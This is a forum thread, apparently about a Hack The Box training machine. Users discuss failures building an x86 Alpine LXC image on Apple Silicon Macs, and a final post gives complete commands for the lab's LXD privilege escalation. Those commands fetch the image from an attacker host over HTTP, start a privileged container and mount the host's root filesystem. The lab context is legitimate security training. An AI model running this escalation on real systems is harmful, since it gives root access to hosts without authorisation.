'Included' Starting Point Machine on Apple Silicon

I’m trying to complete the ‘Included’ challenge on my Mac and I’m having trouble building the alpine linux image for x86. I had a problem building 3.8 for my native architecture but 3.9 worked okay. But I can’t get it to build for x86.

Here’s the error I get:

Error: Failed to manage packages: Failed to refresh: fork/exec /sbin/apk: no such file or directory
ERROR [2023-07-31T01:49:45-04:00] Failed running distrobuilder err=“Failed to manage packages: Failed to refresh: fork/exec /sbin/apk: no such file or directory”

Any advice?

I couldn’t get it to build the x86_64 image. I finally broke down and did the challenge on my arm64 machine. I guess another way I could have done it was using PwnBox. I find the user experience much better on my Mac though so this was kind of a bummer.

Thanks for all your help.

It seems like you are encountering an error related to the apk package manager while trying to build an Alpine Linux image for x86 architecture using distrobuilder. The error message indicates that the apk command is not found or not accessible during the build process.

I’m not sure what apk is or where to find it. ‘apt-file list apk’ turns up nothing. I even used some regex expressions to try to find it. Nothing. So, what the ■■■■ is apk?

Update: I did some Googling. It turns out APK stands for Alpine Package Keeper. I found something here: Download pulls wrong architecture · Issue #314 · lxc/distrobuilder · GitHub . It seems like distrobuilder just isn’t built to allow building for a non-native architecture. The suggested fix is to use qemu. Bummer.

I had the same issue.

The easiest way I found was to log into the pwn box and recreate the steps I did on my M1 machine.

The pwn box opens in a new tab in the browser, so it wasn’t so bad. If anything, it helped with some reinforcement learning re-tracing the steps I had already covered

Hey guys.
(cross-post from my solution on starting-point-included-problem-building-alpine/316032/15)

The reason for the errors are:

1. The walkthrough instructions are incorrect (uses build-lxd instead of build-lxc)
2. (For users with Mac or other ARM devices) You’re building an LXC image with the wrong architecture.

Building LXC image on an ARM processor (like M-series Macs) will fail to work on the target machine, as it’s an x86-64 processor.

Solutions:

1. Build on an AMD64 device
2. Download prebuilt from a trusted repo, instead of building this yourself.

Canonical LXD images repo

Prebuilt Alpine LXC images can be downloadedc from the Canonical LXD images archive:

https://images.lxd.canonical.com/

Version 3.18 → Index of /images/alpine/3.18/amd64/default/20241124_0023/

Steps to get working LXC image from Canonical repo

# Get the images via wget
# -- NOTE: can do this on the target machine, or on attacker machine 
# and then transfer it over via python3 http server. 
# See below
wget https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/20241124_0023/lxd.tar.xz .
wget https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/20241124_0023/rootfs.squashfs .

# -- OPTIONAL: get these from attacker machine
# Serve the directory with Python3
python3 -m http.server 8080

# On target machine -- Get the files
wget ${attackerIp}/lxd.tar.xz
wget ${attackerIp}/rootfs.squashfs

# -- IMPORT LXC IMAGE
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

Exploitation:

# Add privleged mode
lxc init alpine privesc -c security.privileged=true

# Mount the root disk
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

# Run the container
lxc start privesc
lxc exec privesc /bin/sh

If this works for you, upvote it.
Thanks